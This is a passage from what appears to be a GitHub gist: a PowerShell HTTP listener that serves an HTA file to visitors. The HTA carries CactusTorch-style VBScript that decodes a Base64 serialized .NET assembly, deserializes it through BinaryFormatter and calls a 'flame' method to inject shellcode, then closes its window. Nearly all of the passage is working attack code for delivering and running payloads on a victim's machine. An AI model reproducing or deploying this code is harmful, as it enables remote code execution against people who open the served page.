s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"
entry_class = "cactusTorch"
Dim fmt, al, d, o
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
al.Add fmt.SurrogateSelector
Set d = fmt.Deserialize_2(Base64ToStream(s))
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.flame binary,code
End Sub
SetVersion
On Error Resume Next
Run
If Err.Number <> 0 Then
Debug Err.Description
Err.Clear
End If
self.close
</script>
</head>
<body>
<script>self.close();
</body>
</html>'
$buffer = $enc.GetBytes($htacode)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
continue
}
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
}
$listener.Stop()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment